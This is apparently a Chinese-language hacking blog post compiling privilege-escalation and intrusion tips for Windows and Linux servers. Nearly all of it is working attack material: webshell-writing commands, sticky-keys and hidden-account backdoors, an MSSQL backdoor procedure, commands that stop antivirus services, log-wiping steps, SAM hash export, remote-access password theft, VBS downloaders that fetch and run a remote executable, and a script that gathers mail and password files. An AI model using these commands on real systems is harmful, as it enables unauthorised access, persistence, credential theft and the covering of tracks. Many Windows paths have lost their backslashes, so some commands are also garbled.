• 各种提权、渗透经验技巧总结大全


     

    旁站路径问题:
    1、读网站配置。
    2、用以下VBS:

    On Error Resume Next
    If (LCase(Right(WScript.Fullname, 11)) = “wscript.exe”) Then
    MsgBox Space(12) & “IIS Virtual Web Viewer” & Space(12) & Chr(13) & Space(9) & ” Usage:Cscript vWeb.vbs”, 4096, “Lilo”
    WScript.Quit
    End If
    Set objservice = GetObject(“IIS://LocalHost/W3SVC”)
    For Each obj3w In objservice
    If IsNumeric(obj3w.Name) Then
    Set OService = GetObject(“IIS://LocalHost/W3SVC/” & obj3w.Name)
    Set VDirObj = OService.GetObject(“IIsWebVirtualDir”, “ROOT”)
    If Err <> 0 Then WScript.Quit (1)
    WScript.Echo Chr(10) & “[” & OService.ServerComment & “]”
    For Each Binds In OService.ServerBindings
    Web = “{ ” & Replace(Binds, “:”, ” } { “) & ” }”
    WScript.Echo Replace(Split(Replace(Web, ” “, “”), “}{“)(2), “}”, “”)
    Next
    WScript.Echo “Path : ” & VDirObj.Path
    End If
    Next
    3、iis_spy 列举(注:需要支持ASPX,反IISSPY的方法:将 activeds.dll,activeds.tlb 降权)。

    4、得到目标站目录,不能直接跨的。可以通过“echo ^<%execute(request(“cmd”))%^> >>X:目标目录X.asp ”或者“copy 脚本文件 X:目标目录X.asp ”像目标目录写入webshell,或者还可以试试type命令。

    WordPress 的平台,爆绝对路径的方法是:
    url/wp-content/plugins/akismet/akismet.php
    url/wp-content/plugins/akismet/hello.php

    phpMyAdmin 爆路径办法:
    phpMyAdmin/libraries/select_lang.lib.php
    phpMyAdmin/darkblue_orange/layout.inc.php
    phpMyAdmin/index.php?lang[]=1
    phpmyadmin/themes/darkblue_orange/layout.inc.php

    网站可能目录(注:一般是虚拟主机类):
    data/htdocs.网站/网站/

    CMD 下操作 VPN 相关知识、资料:
    #允许administrator拨入该VPN:
    netsh ras set user administrator permit

    #禁止administrator拨入该VPN:
    netsh ras set user administrator deny

    #查看哪些用户可以拨入VPN:
    netsh ras show user

    #查看VPN分配IP的方式:
    netsh ras ip show config

    #使用地址池的方式分配IP:
    netsh ras ip set addrassign method = pool

    #地址池的范围是从192.168.3.1到192.168.3.254:
    netsh ras ip add range from = 192.168.3.1 to = 192.168.3.254

    Cmd、Dos 命令行下添加 SQL 用户的方法:
    需要有管理员权限,在命令下先建立一个“c: est.qry”文件,内容如下:

    exec master.dbo.sp_addlogin test,123
    EXEC sp_addsrvrolemember ‘test, ‘sysadmin’

    然后在DOS下执行:cmd.exe /c isql -E /U alma /P /i c: est.qry

    另类的加用户方法:

    在删掉了 net.exe 和不用 adsi 之外,新的加用户的方法。代码如下:

    js:
    var o=new ActiveXObject( “Shell.Users” );
    z=o.create(“test”) ;
    z.changePassword(“123456″,””)
    z.setting(“AccountType”)=3;

    vbs:
    Set o=CreateObject( “Shell.Users” )
    Set z=o.create(“test”)
    z.changePassword “123456”,””
    z.setting(“AccountType”)=3

    Cmd 访问控制权限控制:
    命令如下:

    cacls c: /e /t /g everyone:F #c盘everyone权限
    cacls “目录” /d everyone #everyone不可读,包括admin

    备注:

    反制方法,在文件夹安全设置里将 Everyone 设定为不可读,如果没有安全性选项:工具 – 文件夹选项 – 使用简单的共享去掉即可。

    3389 相关,以下配合PR更好:
    a、防火墙TCP/IP筛选.(关闭:net stop policyagent & net stop sharedaccess)
    b、内网环境(lcx.exe)
    c、终端服务器超出了最大允许连接(XP 运行:mstsc /admin;2003 运行:mstsc /console)

    1.查询终端端口:

    REG query HKLMSYSTEMCurrentControlSetControlTerminal” “ServerWinStationsRDP-Tcp /v PortNumber

    2.开启XP&2003终端服务:

    REG ADD HKLMSYSTEMCurrentControlSetControlTerminal” “Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

    3.更改终端端口为2008(十六进制为:0x7d8):

    REG ADD HKLMSYSTEMCurrentControlSetControlTerminal” “ServerWds dpwdTds cp /v PortNumber /t REG_DWORD /d 0x7d8 /f

    REG ADD HKLMSYSTEMCurrentControlSetControlTerminal” “ServerWinStationsRDP-Tcp /v PortNumber /t REG_DWORD /d 0x7D8 /f

    4.取消xp&2003系统防火墙对终端服务的限制及IP连接的限制:

    REG ADD HKLMSYSTEMCurrentControlSetServicesSharedAccessParametersFirewallPolicyStandardProfileGloballyOpenPortsList /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabled :@ xpsp2res.dll,-22009 /f

    create table a (cmd text);
    insert into a values (“set wshshell=createobject (“”wscript.shell””)”);
    insert into a values (“a=wshshell.run (“”cmd.exe /c net user admin admin /add””,0)”);
    insert into a values (“b=wshshell.run (“”cmd.exe /c net localgroup administrators admin /add””,0)”);
    select * from a into outfile “C:\Documents and Settings\All Users\「开始」菜单\程序\启动\a.vbs”;

    BS马的PortMap功能,类似LCX做转发。若果支持ASPX,用这个转发会隐蔽点。(注:一直忽略了在偏僻角落的那个功能)

    关闭常见杀软(把杀软所在的文件的所有权限去掉):
    处理变态诺顿企业版:
    net stop “Symantec AntiVirus” /y
    net stop “Symantec AntiVirus Definition Watcher” /y
    net stop “Symantec Event Manager” /y
    net stop “System Event Notification” /y
    net stop “Symantec Settings Manager” /y

    麦咖啡:net stop “McAfee McShield”

    Symantec病毒日志:
    C:Documents and SettingsAll UsersApplication DataSymantecSymantec Endpoint ProtectionLogs

    Symantec病毒备份:
    C:Documents and SettingsAll UsersApplication DataSymantecSymantec Endpoint ProtectionQuarantine

    Nod32病毒备份:
    C:Docume~1AdministratorLocal SettingsApplication DataESETESET NOD32 AntivirusQuarantine

    Nod32移除密码保护:
    删除“HKEY_LOCAL_MACHINESOFTWAREESETESET SecurityCurrentVersionInfoPackageID”即可

    安装5次shift后门,沾滞键后门,替换SHIFT后门:
    5次SHIFT,沾滞键后门:
    copy %systemroot%system32sethc.exe %systemroot%system32dllcachesethc1.exe
    copy %systemroot%system32cmd.exe %systemroot%system32dllcachesethc.exe /y
    copy %systemroot%system32cmd.exe %systemroot%system32sethc.exe /y

    替换SHIFT后门:
    attrib c:windowssystem32sethc.exe -h -r -s
    attrib c:windowssystem32dllcachesethc.exe -h -r -s
    del c:windowssystem32sethc.exe
    copy c:windowsexplorer.exe c:windowssystem32sethc.exe
    copy c:windowssystem32sethc.exe c:windowssystem32dllcachesethc.exe
    attrib c:windowssystem32sethc.exe +h +r +s
    attrib c:windowssystem32dllcachesethc.exe +h +r +s

    添加隐藏系统账号:
    1、执行命令:“net user admin$ 123456 /add&net localgroup administrators admin$ /add”。
    2、导出注册表SAM下用户的两个键值。
    3、在用户管理界面里的 admin$ 删除,然后把备份的注册表导回去。
    4、利用 Hacker Defender 把相关用户注册表隐藏。

    安装 MSSQL 扩展后门:
    USE master;
    EXEC sp_addextendedproc ‘xp_helpsystem’, ‘xp_helpsystem.dll';
    GRANT exec On xp_helpsystem TO public;

    处理服务器MSFTP日志:
    在“C:WINNTsystem32LogFilesMSFTPSVC1”下有 ex011120.log / ex011121.log / ex011124.log 三个文件,直接删除 ex0111124.log 不成功,显示“原文件…正在使用”。

    当然可以直接删除“ex011120.log / ex011121.log”。然后用记事本打开“ex0111124.log”,删除里面的一些内容后,保存,覆盖退出,成功。

    当停止“msftpsvc”服务后可直接删除“ex011124.log”。

    MSSQL查询分析器连接记录清除:
    MSSQL 2000 位于注册表如下:

    HKEY_CURRENT_USERSoftwareMicrosoftMicrosoft SQL Server80ToolsClientPrefServers

    找到接接过的信息删除。

    MSSQL 2005 是在:

    C:Documents and Settings\Application DataMicrosoftMicrosoft SQL Server90ToolsShellmru.dat

    防BT系统拦截技巧,可以使用远程下载shell:

    <% Sub eWebEditor_SaveRemoteFile(s_LocalFileName, s_RemoteFileUrl) Dim Ads, Retrieval, GetRemoteData On Error Resume Next Set Retrieval = Server.CreateObject(“Microsoft.XMLHTTP”) With Retrieval .Open “Get”, s_RemoteFileUrl, False, “”, “” .Send GetRemoteData = .ResponseBody End With Set Retrieval = Nothing Set Ads = Server.CreateObject(“Adodb.Stream”) With Ads .Type = 1 .Open .Write GetRemoteData .SaveToFile Server.MapPath(s_LocalFileName), 2 .Cancel() .Close() End With Set Ads = Nothing End Sub eWebEditor_SaveRemoteFile “your shell’s name “, “your shell’urL ” %>

    防BT系统拦截技巧,可以使用远程下载shell,也达到了隐藏自身的效果,也可以做为超隐蔽的后门,神马的免杀webshell,用服务器安全工具一扫通通挂掉了。

    VNC、Radmin、PcAnywhere 的提权方法:
    首先利用 shell 读取 vnc 保存在注册表中的密文,然后再使用工具VNC4X破解。

    注册表位置:HKEY_LOCAL_MACHINESOFTWARERealVNCWinVNC4password

    Radmin 默认端口是4899,先获取密码和端口,如下位置:

    HKEY_LOCAL_MACHINESYSTEMRAdminv2.0ServerParametersParameter //默认密码注册表位置

    HKEY_LOCAL_MACHINESYSTEMRAdminv2.0ServerParametersPort //默认端口注册表位置

    然后用HASH版连接。

    如果我们拿到一台主机的WEBSEHLL。通过查找发现其上安装有 PcAnywhere 同时保存密码文件的目录是允许我们的IUSER权限访问,我们可以下载这个CIF文件到本地破解,再通过 PcAnywhere 从本机登陆服务器。

    保存密码的CIF文件,不是位于PcAnywhere的安装目录,而且位于安装PcAnywhere所安装盘的:

    “Documents and SettingsAll UsersApplication DataSymantecpcAnywhere”

    如果PcAnywhere安装在“D:program”文件夹下,那么PcAnywhere的密码文件就保存在:“D:Documents and SettingsAll UsersApplication DataSymantecpcAnywhere”文件夹下。

    搜狗输入法 PinyinUp.exe 提权:
    搜狗输入法的“PinyinUp.exe”是可读可写的直接替换即可,位于搜狗安装目录下,例如:

    “C:Program FilesSogouInput5.0.0.3819PinyinUp.exe”

    搜狗拼音输入法,会定时调用这个文件进行升级,禁止还禁止不掉,呵呵,天然的后门。

    WinWebMail 提权加用户:
    WinWebMail目录下的web必须设置everyone权限可读可写,在开始程序里,找到WinWebMail快捷方式,接下来,看路径,访问“路径web”传 shell,访问shell后,权限是system,直接放远控进启动项,等待下次重启。

    没有删cmd组件的可以直接加用户,7i24的web目录也是可写,权限为administrator。

    1433 SA权限构建注入点:
    <% strSQLServerName = “服务器ip” strSQLDBUserName = “数据库帐号” strSQLDBPassword = “数据库密码” strSQLDBName = “数据库名称” Set conn = server.CreateObject(“ADODB.Connection”) strCon = “Provider=SQLOLEDB.1;Persist Security Info=False;Server=” & strSQLServerName & “;User ID=” & strSQLDBUserName & “;Password=” & strSQLDBPassword & “;Database=” & strSQLDBName & “;” conn.open strCon Dim rs, strSQL, id Set rs = server.CreateObject(“ADODB.recordset”) id = request(“id”) strSQL = “select * from ACTLIST where worldid=” & idrs.open strSQL,conn,1,3 rs.Close %>

    liunx 相关提权渗透技巧总结,一、ldap 渗透技巧:
    1.cat /etc/nsswitch
    看看密码登录策略我们可以看到使用了file ldap模式

    2.less /etc/ldap.conf
    base ou=People,dc=unix-center,dc=net
    找到ou,dc,dc设置

    3.查找管理员信息

    匿名方式
    ldapsearch -x -D “cn=administrator,cn=People,dc=unix-center,dc=net” -b “cn=administrator,cn=People,dc=unix-center,dc=net” -h 192.168.2.2

    有密码形式
    ldapsearch -x -W -D “cn=administrator,cn=People,dc=unix-center,dc=net” -b “cn=administrator,cn=People,dc=unix-center,dc=net” -h 192.168.2.2

    4.查找10条用户记录
    ldapsearch -h 192.168.2.2 -x -z 10 -p 指定端口

    实战:
    1.cat /etc/nsswitch
    看看密码登录策略我们可以看到使用了file ldap模式

    2.less /etc/ldap.conf
    base ou=People,dc=unix-center,dc=net
    找到ou,dc,dc设置

    3.查找管理员信息

    匿名方式
    ldapsearch -x -D “cn=administrator,cn=People,dc=unix-center,dc=net” -b “cn=administrator,cn=People,dc=unix-center,dc=net” -h 192.168.2.2

    有密码形式
    ldapsearch -x -W -D “cn=administrator,cn=People,dc=unix-center,dc=net” -b “cn=administrator,cn=People,dc=unix-center,dc=net” -h 192.168.2.2

    4.查找10条用户记录
    ldapsearch -h 192.168.2.2 -x -z 10 -p 指定端口

    渗透实战:
    1.返回所有的属性
    ldapsearch -h 192.168.7.33 -b “dc=ruc,dc=edu,dc=cn” -s sub “objectclass=*”
    version: 1
    dn: dc=ruc,dc=edu,dc=cn
    dc: ruc
    objectClass: domain

    dn: uid=manager,dc=ruc,dc=edu,dc=cn
    uid: manager
    objectClass: inetOrgPerson
    objectClass: organizationalPerson
    objectClass: person
    objectClass: top
    sn: manager
    cn: manager

    dn: uid=superadmin,dc=ruc,dc=edu,dc=cn
    uid: superadmin
    objectClass: inetOrgPerson
    objectClass: organizationalPerson
    objectClass: person
    objectClass: top
    sn: superadmin
    cn: superadmin

    dn: uid=admin,dc=ruc,dc=edu,dc=cn
    uid: admin
    objectClass: inetOrgPerson
    objectClass: organizationalPerson
    objectClass: person
    objectClass: top
    sn: admin
    cn: admin

    dn: uid=dcp_anonymous,dc=ruc,dc=edu,dc=cn
    uid: dcp_anonymous
    objectClass: top
    objectClass: person
    objectClass: organizationalPerson
    objectClass: inetOrgPerson
    sn: dcp_anonymous
    cn: dcp_anonymous

    2.查看基类
    bash-3.00# ldapsearch -h 192.168.7.33 -b “dc=ruc,dc=edu,dc=cn” -s base “objectclass=*” |

    more
    version: 1
    dn: dc=ruc,dc=edu,dc=cn
    dc: ruc
    objectClass: domain

    3.查找
    bash-3.00# ldapsearch -h 192.168.7.33 -b “” -s base “objectclass=*”
    version: 1
    dn:
    objectClass: top
    namingContexts: dc=ruc,dc=edu,dc=cn
    supportedExtension: 2.16.840.1.113730.3.5.7
    supportedExtension: 2.16.840.1.113730.3.5.8
    supportedExtension: 1.3.6.1.4.1.4203.1.11.1
    supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.25
    supportedExtension: 2.16.840.1.113730.3.5.3
    supportedExtension: 2.16.840.1.113730.3.5.5
    supportedExtension: 2.16.840.1.113730.3.5.6
    supportedExtension: 2.16.840.1.113730.3.5.4
    supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.1
    supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.2
    supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.3
    supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.4
    supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.5
    supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.6
    supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.7
    supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.8
    supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.9
    supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.23
    supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.11
    supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.12
    supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.13
    supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.14
    supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.15
    supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.16
    supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.17
    supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.18
    supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.19
    supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.21
    supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.22
    supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.24
    supportedExtension: 1.3.6.1.4.1.1466.20037
    supportedExtension: 1.3.6.1.4.1.4203.1.11.3
    supportedControl: 2.16.840.1.113730.3.4.2
    supportedControl: 2.16.840.1.113730.3.4.3
    supportedControl: 2.16.840.1.113730.3.4.4
    supportedControl: 2.16.840.1.113730.3.4.5
    supportedControl: 1.2.840.113556.1.4.473
    supportedControl: 2.16.840.1.113730.3.4.9
    supportedControl: 2.16.840.1.113730.3.4.16
    supportedControl: 2.16.840.1.113730.3.4.15
    supportedControl: 2.16.840.1.113730.3.4.17
    supportedControl: 2.16.840.1.113730.3.4.19
    supportedControl: 1.3.6.1.4.1.42.2.27.9.5.2
    supportedControl: 1.3.6.1.4.1.42.2.27.9.5.6
    supportedControl: 1.3.6.1.4.1.42.2.27.9.5.8
    supportedControl: 1.3.6.1.4.1.42.2.27.8.5.1
    supportedControl: 1.3.6.1.4.1.42.2.27.8.5.1
    supportedControl: 2.16.840.1.113730.3.4.14
    supportedControl: 1.3.6.1.4.1.1466.29539.12
    supportedControl: 2.16.840.1.113730.3.4.12
    supportedControl: 2.16.840.1.113730.3.4.18
    supportedControl: 2.16.840.1.113730.3.4.13
    supportedSASLMechanisms: EXTERNAL
    supportedSASLMechanisms: DIGEST-MD5
    supportedLDAPVersion: 2
    supportedLDAPVersion: 3
    vendorName: Sun Microsystems, Inc.
    vendorVersion: Sun-Java(tm)-System-Directory/6.2
    dataversion: 020090516011411
    netscapemdsuffix: cn=ldap://dc=webA:389
    supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA
    supportedSSLCiphers: TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA
    supportedSSLCiphers: TLS_DHE_RSA_WITH_AES_256_CBC_SHA
    supportedSSLCiphers: TLS_DHE_DSS_WITH_AES_256_CBC_SHA
    supportedSSLCiphers: TLS_ECDH_RSA_WITH_AES_256_CBC_SHA
    supportedSSLCiphers: TLS_ECDH_ECDSA_WITH_AES_256_CBC_SHA
    supportedSSLCiphers: TLS_RSA_WITH_AES_256_CBC_SHA
    supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_RC4_128_SHA
    supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA
    supportedSSLCiphers: TLS_ECDHE_RSA_WITH_RC4_128_SHA
    supportedSSLCiphers: TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA
    supportedSSLCiphers: TLS_DHE_DSS_WITH_RC4_128_SHA
    supportedSSLCiphers: TLS_DHE_RSA_WITH_AES_128_CBC_SHA
    supportedSSLCiphers: TLS_DHE_DSS_WITH_AES_128_CBC_SHA
    supportedSSLCiphers: TLS_ECDH_RSA_WITH_RC4_128_SHA
    supportedSSLCiphers: TLS_ECDH_RSA_WITH_AES_128_CBC_SHA
    supportedSSLCiphers: TLS_ECDH_ECDSA_WITH_RC4_128_SHA
    supportedSSLCiphers: TLS_ECDH_ECDSA_WITH_AES_128_CBC_SHA
    supportedSSLCiphers: SSL_RSA_WITH_RC4_128_MD5
    supportedSSLCiphers: SSL_RSA_WITH_RC4_128_SHA
    supportedSSLCiphers: TLS_RSA_WITH_AES_128_CBC_SHA
    supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_3DES_EDE_CBC_SHA
    supportedSSLCiphers: TLS_ECDHE_RSA_WITH_3DES_EDE_CBC_SHA
    supportedSSLCiphers: SSL_DHE_RSA_WITH_3DES_EDE_CBC_SHA
    supportedSSLCiphers: SSL_DHE_DSS_WITH_3DES_EDE_CBC_SHA
    supportedSSLCiphers: TLS_ECDH_RSA_WITH_3DES_EDE_CBC_SHA
    supportedSSLCiphers: TLS_ECDH_ECDSA_WITH_3DES_EDE_CBC_SHA
    supportedSSLCiphers: SSL_RSA_FIPS_WITH_3DES_EDE_CBC_SHA
    supportedSSLCiphers: SSL_RSA_WITH_3DES_EDE_CBC_SHA
    supportedSSLCiphers: SSL_DHE_RSA_WITH_DES_CBC_SHA
    supportedSSLCiphers: SSL_DHE_DSS_WITH_DES_CBC_SHA
    supportedSSLCiphers: SSL_RSA_FIPS_WITH_DES_CBC_SHA
    supportedSSLCiphers: SSL_RSA_WITH_DES_CBC_SHA
    supportedSSLCiphers: TLS_RSA_EXPORT1024_WITH_RC4_56_SHA
    supportedSSLCiphers: TLS_RSA_EXPORT1024_WITH_DES_CBC_SHA
    supportedSSLCiphers: SSL_RSA_EXPORT_WITH_RC4_40_MD5
    supportedSSLCiphers: SSL_RSA_EXPORT_WITH_RC2_CBC_40_MD5
    supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_NULL_SHA
    supportedSSLCiphers: TLS_ECDHE_RSA_WITH_NULL_SHA
    supportedSSLCiphers: TLS_ECDH_RSA_WITH_NULL_SHA
    supportedSSLCiphers: TLS_ECDH_ECDSA_WITH_NULL_SHA
    supportedSSLCiphers: SSL_RSA_WITH_NULL_SHA
    supportedSSLCiphers: SSL_RSA_WITH_NULL_MD5
    supportedSSLCiphers: SSL_CK_RC4_128_WITH_MD5
    supportedSSLCiphers: SSL_CK_RC2_128_CBC_WITH_MD5
    supportedSSLCiphers: SSL_CK_DES_192_EDE3_CBC_WITH_MD5
    supportedSSLCiphers: SSL_CK_DES_64_CBC_WITH_MD5
    supportedSSLCiphers: SSL_CK_RC4_128_EXPORT40_WITH_MD5
    supportedSSLCiphers: SSL_CK_RC2_128_CBC_EXPORT40_WITH_MD5

    liunx 相关提权渗透技巧总结,二、NFS 渗透技巧:
    列举IP:showmount -e ip

    liunx 相关提权渗透技巧总结,三、rsync渗透技巧:
    1.查看rsync服务器上的列表:

    rsync 210.51.X.X::
    finance
    img_finance
    auto
    img_auto
    html_cms
    img_cms
    ent_cms
    ent_img
    ceshi
    res_img
    res_img_c2
    chip
    chip_c2
    ent_icms
    games
    gamesimg
    media
    mediaimg
    fashion
    res-fashion
    res-fo
    taobao-home
    res-taobao-home
    house
    res-house
    res-home
    res-edu
    res-ent
    res-labs
    res-news
    res-phtv
    res-media
    home
    edu
    news
    res-book

    看相应的下级目录(注意一定要在目录后面添加上/)

    rsync 210.51.X.X::htdocs_app/
    rsync 210.51.X.X::auto/
    rsync 210.51.X.X::edu/

    2.下载rsync服务器上的配置文件
    rsync -avz 210.51.X.X::htdocs_app/ /tmp/app/

    3.向上更新rsync文件(成功上传,不会覆盖)
    rsync -avz nothack.php 210.51.X.X::htdocs_app/warn/
    http://app.finance.xxx.com/warn/nothack.txt

    liunx 相关提权渗透技巧总结,四、squid渗透技巧:
    nc -vv baidu.com 80
    GET HTTP://www.sina.com / HTTP/1.0
    GET HTTP://WWW.sina.com:22 / HTTP/1.0

    liunx 相关提权渗透技巧总结,五、SSH端口转发:
    ssh -C -f -N -g -R 44:www.nxadmin.com:22 cnbird@ip

    liunx 相关提权渗透技巧总结,六、joomla渗透小技巧:
    确定版本:

    index.php?option=com_content&view=article&id=30:what-languages-are-supported-by-joomla-15&catid=32:languages&Itemid=47

    重新设置密码:

    index.php?option=com_user&view=reset&layout=confirm

    liunx 相关提权渗透技巧总结,七、Linux添加UID为0的root用户:
    useradd -o -u 0 nothack

    liunx 相关提权渗透技巧总结,八、freebsd本地提权:
    [argp@julius ~]$ uname -rsi
    * freebsd 7.3-RELEASE GENERIC
    * [argp@julius ~]$ sysctl vfs.usermount
    * vfs.usermount: 1
    * [argp@julius ~]$ id
    * uid=1001(argp) gid=1001(argp) groups=1001(argp)
    * [argp@julius ~]$ gcc -Wall nfs_mount_ex.c -o nfs_mount_ex
    * [argp@julius ~]$ ./nfs_mount_ex
    *
    calling nmount()

    tar 文件夹打包:
    1、tar打包:

    tar -cvf /home/public_html/*.tar /home/public_html/–exclude=排除文件*.gif 排除目录 /xx/xx/*
    alzip打包(韩国) alzip -a D:WEB d:web*.rar
    {
    注:
    关于tar的打包方式,linux不以扩展名来决定文件类型。
    若压缩的话tar -ztf *.tar.gz 查看压缩包里内容 tar -zxf *.tar.gz 解压
    那么用这条比较好 tar -czf /home/public_html/*.tar.gz /home/public_html/–exclude= 排除文件*.gif 排除目录 /xx/xx/*
    }

    提权先执行systeminfo
    token 漏洞补丁号 KB956572
    Churrasco kb952004
    命令行RAR打包~~·
    rar a -k -r -s -m3 c:1.rar c:folder

    收集系统信息的脚本:
    for window:

    @echo off
    echo #########system info collection
    systeminfo
    ver
    hostname
    net user
    net localgroup
    net localgroup administrators
    net user guest
    net user administrator

    echo #######at- with atq#####
    echo schtask /query

    echo
    echo ####task-list#############
    tasklist /svc
    echo
    echo ####net-work infomation
    ipconfig/all
    route print
    arp -a
    netstat -anipconfig /displaydns
    echo
    echo #######service############
    sc query type= service state= all
    echo #######file-##############
    cd
    tree -F
    for linux:

    #!/bin/bash

    echo #######geting sysinfo####
    echo ######usage: ./getinfo.sh >/tmp/sysinfo.txt
    echo #######basic infomation##
    cat /proc/meminfo
    echo
    cat /proc/cpuinfo
    echo
    rpm -qa 2>/dev/null
    ######stole the mail……######
    cp -a /var/mail /tmp/getmail 2>/dev/null
    echo ‘u’r id is’ `id`
    echo ###atq&crontab#####
    atq
    crontab -l
    echo #####about var#####
    set

    echo #####about network###
    ####this is then point in pentest,but i am a new bird,so u need to add some in it
    cat /etc/hosts
    hostname
    ipconfig -a
    arp -v
    echo ########user####
    cat /etc/passwd|grep -i sh

    echo ######service####
    chkconfig –list

    for i in {oracle,mysql,tomcat,samba,apache,ftp}
    cat /etc/passwd|grep -i $i
    done

    locate passwd >/tmp/password 2>/dev/null
    sleep 5
    locate password >>/tmp/password 2>/dev/null
    sleep 5
    locate conf >/tmp/sysconfig 2>dev/null
    sleep 5
    locate config >>/tmp/sysconfig 2>/dev/null
    sleep 5

    ###maybe can use “tree /”###
    echo ##packing up#########
    tar cvf getsysinfo.tar /tmp/getmail /tmp/password /tmp/sysconfig
    rm -rf /tmp/getmail /tmp/password /tmp/sysconfig

    ethash 不免杀怎么获取本机 hash:
    首先导出注册表:

    Windows 2000:regedit /e d:aa.reg “HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsers”

    Windows 2003:reg export “HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsers” d:aa.reg

    注意权限问题,一般注册表默认sam目录是不能访问的。需要设置为完全控制以后才可以访问(界面登录的需要注意,system权限可以忽略)。

    接下来就简单了,把导出的注册表,down 到本机,修改注册表头导入本机,然后用抓去hash的工具抓本地用户就OK了
    hash 抓完了记得把自己的账户密码改过来哦!

    当 GetHashes 获取不到 hash 时,可以用冰刃把 sam 复制到桌面。据我所知,某人是用这个方法虚拟机多次因为不知道密码而进不去!~

    vbs 下载者:
    1:
    echo Set sGet = createObject(“ADODB.Stream”) >>c:windowscftmon.vbs
    echo sGet.Mode = 3 >>c:windowscftmon.vbs
    echo sGet.Type = 1 >>c:windowscftmon.vbs
    echo sGet.Open() >>c:windowscftmon.vbs
    echo sGet.Write(xPost.responseBody) >>c:windowscftmon.vbs
    echo sGet.SaveToFile “c:windowse.exe”,2 >>c:windowscftmon.vbs
    echo Set objShell = CreateObject(“Wscript.Shell”) >>c:windowscftmon.vbs
    echo objshell.run “””c:windowse.exe””” >>c:windowscftmon.vbs
    cftmon.vbs

    2:
    On Error Resume Next:Dim iRemote,iLocal,s1,s2
    iLocal = LCase(WScript.Arguments(1)):iRemote = LCase(WScript.Arguments(0))
    s1=”Mi”+”cro”+”soft”+”.”+”XML”+”HTTP”:s2=”ADO”+”DB”+”.”+”Stream”
    Set xPost = CreateObject(s1):xPost.Open “GET”,iRemote,0:xPost.Send()
    Set sGet = CreateObject(s2):sGet.Mode=3:sGet.Type=1:sGet.Open()
    sGet.Write(xPost.responseBody):sGet.SaveToFile iLocal,2

    cscript c:down.vbs http://xxxx/mm.exe c:mm.exe

    create table a (cmd text):
    insert into a values (“set wshshell=createobject (“”wscript.shell””)”);
    insert into a values (“a=wshshell.run (“”cmd.exe /c net user admin admin /add””,0)”);
    insert into a values (“b=wshshell.run (“”cmd.exe /c net localgroup administrators admin /add””,0)”);
    select * from a into outfile “C:\Documents and Settings\All Users\「开始」菜单\程序\启动\a.vbs”;

    Cmd 下目录的操作技巧:
    列出d的所有目录:
    for /d %i in (d:freehost*) do @echo %i

    把当前路径下文件夹的名字只有1-3个字母的显示出来:
    for /d %i in (???) do @echo %i

    以当前目录为搜索路径,把当前目录与下面的子目录的全部EXE文件列出:
    for /r %i in (*.exe) do @echo %i

    以指定目录为搜索路径,把当前目录与下面的子目录的所有文件列出:
    for /r “f:freehosthmadesignweb” %i in (*.*) do @echo %i

    这个会显示a.txt里面的内容,因为/f的作用,会读出a.txt中:
    for /f %i in (c:1.txt) do echo %i

    delims=后的空格是分隔符,tokens是取第几个位置:
    for /f “tokens=2 delims= ” %i in (a.txt) do echo %i

    Linux 系统下的一些常见路径:
    /etc/passwd
    /etc/shadow
    /etc/fstab
    /etc/host.conf
    /etc/motd
    /etc/ld.so.conf
    /var/www/htdocs/index.php
    /var/www/conf/httpd.conf
    /var/www/htdocs/index.html
    /var/httpd/conf/php.ini
    /var/httpd/htdocs/index.php
    /var/httpd/conf/httpd.conf
    /var/httpd/htdocs/index.html
    /var/httpd/conf/php.ini
    /var/www/index.html
    /var/www/index.php
    /opt/www/conf/httpd.conf
    /opt/www/htdocs/index.php
    /opt/www/htdocs/index.html
    /usr/local/apache/htdocs/index.html
    /usr/local/apache/htdocs/index.php
    /usr/local/apache2/htdocs/index.html
    /usr/local/apache2/htdocs/index.php
    /usr/local/httpd2.2/htdocs/index.php
    /usr/local/httpd2.2/htdocs/index.html
    /tmp/apache/htdocs/index.html
    /tmp/apache/htdocs/index.php
    /etc/httpd/htdocs/index.php
    /etc/httpd/conf/httpd.conf
    /etc/httpd/htdocs/index.html
    /www/php/php.ini
    /www/php4/php.ini
    /www/php5/php.ini
    /www/conf/httpd.conf
    /www/htdocs/index.php
    /www/htdocs/index.html
    /usr/local/httpd/conf/httpd.conf
    /apache/apache/conf/httpd.conf
    /apache/apache2/conf/httpd.conf
    /etc/apache/apache.conf
    /etc/apache2/apache.conf
    /etc/apache/httpd.conf
    /etc/apache2/httpd.conf
    /etc/apache2/vhosts.d/00_default_vhost.conf
    /etc/apache2/sites-available/default
    /etc/phpmyadmin/config.inc.php
    /etc/mysql/my.cnf
    /etc/httpd/conf.d/php.conf
    /etc/httpd/conf.d/httpd.conf
    /etc/httpd/logs/error_log
    /etc/httpd/logs/error.log
    /etc/httpd/logs/access_log
    /etc/httpd/logs/access.log
    /home/apache/conf/httpd.conf
